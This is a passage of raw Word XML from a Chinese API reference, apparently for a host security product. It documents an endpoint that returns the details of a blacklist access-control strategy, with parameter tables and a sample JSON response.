          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="34CEFAEA" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="4CFA4384" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5FD38BA1" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>id</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="51A07F05" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1535D35D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>标签id</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="09E02D31" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="37FD09A7" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>tagName</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="01681853" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1179D4AA" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>标签名称</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="1E049DB1" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="78326EF3" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>tagColor</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="41D76709" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7F98A526" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>标签颜色</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="3A577622" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="32223E95" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>osType</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="66C7A534" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1419BC3F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>操作系统类型，1：linux， 2：windows</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="606D3D09" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="485BC780" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>agentId</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0401487A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="40463508" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>主机id</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="59CB66E6" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="233" w:name="查看策略详情"/>
      <w:bookmarkEnd w:id="232"/>
      <w:r>
        <w:t>查看策略详情</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B375D38" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>调用接口：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46001B1D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>GET /external/api/ms-srv/api/black-strategy/detail</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D1D056C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求参数：</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="0020" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="630"/>
        <w:gridCol w:w="777"/>
        <w:gridCol w:w="1044"/>
        <w:gridCol w:w="840"/>
      </w:tblGrid>
      <w:tr w:rsidR="00497C54" w14:paraId="630AD7D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D65CA91" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3518D758" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="150A2D6D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>是否必填</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="427D7C00" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="7BABC18A" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3206B2F6" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>id</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="460C6421" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="646A1AE1" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>是</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="55962239" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>策略id</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="072CCD5D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CCF1092" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>/external/api/ms-srv/api/black-strategy/detail?id=111111</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EBB9C31" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>返回示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E63AD89" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"id": "629dbf65c56dd50d10c9a984",</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"strategyName": "新建黑名单-20220606164812",</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"dstRealmType": 1,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"dstGroups": [{</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"groupId": 9,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"platform": 1,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"name": "l15a29a",</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"description": "l15a29a",</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"parentId": 0</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>}],</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"dstTags": [{</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"id": null,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"tagName": "全部标签",</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"tagColor": null</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>}],</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"dstIpRanges": null,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"dstAgentSize": 2,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"dstAgentIds": null,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"dstIpName": "",</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"srcRealmType": 2,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"srcGroups": [],</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"srcTags": [],</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"srcIpRanges": null,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:tab/>
        <w:t>"srcAgentSize": 2,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"srcAgentIds": ["628f27265aa65cab", "628f272b5aa65cac"],</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"srcIpName": "10.106.24.32",</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"ports": ["7788"],</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"protos": ["TCP"],</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"status": 1,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"updateTime": 1654505570177,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"optUsername": "jjw",</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"remark": "",</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"displayDstIp": null,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"displaySrcIp": null,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"displayPort": "7788",</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"switchStatus": 0,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"operation": true</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61054147" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>返回rows部分说明：</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="0020" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1563"/>
        <w:gridCol w:w="1009"/>
        <w:gridCol w:w="5666"/>
      </w:tblGrid>
      <w:tr w:rsidR="00497C54" w14:paraId="7F98CBF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1A618D6" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>参数</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7C138DA0" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="152D22B2" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="1EF0FBE9" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="23D5E9F9" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>id</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="607DB91E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="52338E90" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>策略id</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="4307D8F3" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1DFCEC11" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>strategyName</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0AF91A87" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="117B5210" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>策略名称</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="71C38B30" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1F1AB167" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>dstRealmType</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5E148F10" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="55C14010" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>被访问者范围，1:业务组、标签，2:自定义主机，3：自定义ip</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="167025BD" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="75BFA76C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>dstGroups</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5486C528" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>List</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="51467129" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>被访问主机业务组</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="780A7438" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="67647017" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>dstTags</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="132D178C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>List</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="43ED0CA2" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>被访问主机标签</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="60F6AB65" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="44199296" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>dstIpRanges</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="24196347" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>List</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7D026C03" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>被访问者ip范围</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="4BC6E8C2" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="721A28B7" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>dstAgentSize</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7098EB50" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>long</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="35885F90" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>被访问主机数量</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="02C7A737" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="28DC4553" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>dstAgentIds</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="255C5BBE" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>List</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="633852A6" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>被访问自定义主机范围</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="5BFE44E4" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="40669497" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>dstIpName</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3A5F33C2" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="71516E38" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>被访问主机ip</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="53F00DC2" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="44A5C40E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>srcRealmType</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
